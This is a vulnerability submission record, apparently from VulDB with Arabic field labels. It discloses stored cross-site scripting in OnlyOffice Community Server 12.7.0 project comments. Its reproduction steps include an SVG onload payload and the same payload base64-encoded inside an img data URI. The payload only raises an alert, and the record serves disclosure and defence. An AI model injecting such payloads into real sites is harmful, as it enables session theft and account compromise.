| عنوان | Ascensio System SIA OnlyOffice Community Server 12.7.0 Cross Site Scripting |
|---|
| الوصف | Description
In OnlyOffice, users can create projects and add comments. While HTML input is permitted, it also allows embedding SVG images that can contain JavaScript, leading to an XSS vulnerability.
Credits: 0xHamy & Luke Smith
Reproduce
Adding comments to a project:
http://127.0.0.1:8088/Products/Projects/Messages.aspx?prjID=1&id=1#comments
From the comment section, enter raw HTML. The vulnerability can be exploited by abusing the <img> tag to load a base64 encoded SVG image.
Convert the following SVG payload into base64:
<svg xmlns="http://www.w3.org/2000/svg" width="200" height="200" onload="alert('xss')"><rect width="200" height="200" fill="lightblue" /></svg>
Create the payload using the base64 encoded value:
<img src="data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIyMDAiIGhlaWdodD0iMjAwIiBvbmxvYWQ9ImFsZXJ0KCd4c3MnKSI+PHJlY3Qgd2lkdGg9IjIwMCIgaGVpZ2h0PSIyMDAiIGZpbGw9ImxpZ2h0Ymx1ZSIgLz48L3N2Zz4=" alt="XSS">
The alert will be executed whenever the SVG image loads. |
|---|
| المصدر | ⚠️ https://hkohi.ca/vulnerability/20 |
|---|
| المستخدم | 0xHamy (UID 88518) |
|---|
| ارسال | 16/08/2025 05:22 AM (8 أشهر منذ) |
|---|
| الاعتدال | 11/09/2025 07:42 AM (26 days later) |
|---|
| الحالة | تمت الموافقة |
|---|
| إدخال VulDB | 323614 [Ascensio System SIA OnlyOffice حتى 12.7.0 SVG Image Messages.aspx البرمجة عبر المواقع] |
|---|
| النقاط | 20 |
|---|